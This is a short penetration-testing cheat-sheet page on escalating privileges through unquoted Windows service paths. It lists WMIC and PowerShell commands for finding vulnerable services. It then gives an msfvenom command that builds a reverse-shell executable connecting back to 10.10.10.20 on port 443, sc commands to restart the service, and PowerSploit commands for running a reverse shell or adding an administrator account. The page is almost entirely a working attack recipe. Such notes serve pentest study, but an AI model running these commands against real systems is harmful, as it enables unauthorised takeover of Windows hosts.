Hack$Notes
Search…
Unquoted Service Path

Search for Unquoted Path

The following command will search for all the paths except "C:\windows" since a normal user will not have executable permissions on this folder.
## Windows Management Instrumentation Command-Line (WMIC) ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
## WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List
If a service is found with unquoted path check the permissions of the service with icacls. If we have permissions on any of the folders that leads to the executable then we can escalate our privileges.

Create an executable msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace and restart service.

sc stop service_name
sc start service_name

Powersploit

Within powershell run the following.
# Find them
Get-ServiceUnquoted
# Execure a reverse shell or adding new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"
Copy link
On this page
Search for Unquoted Path
Create an executable msfvenom payload
Replace and restart service.
Powersploit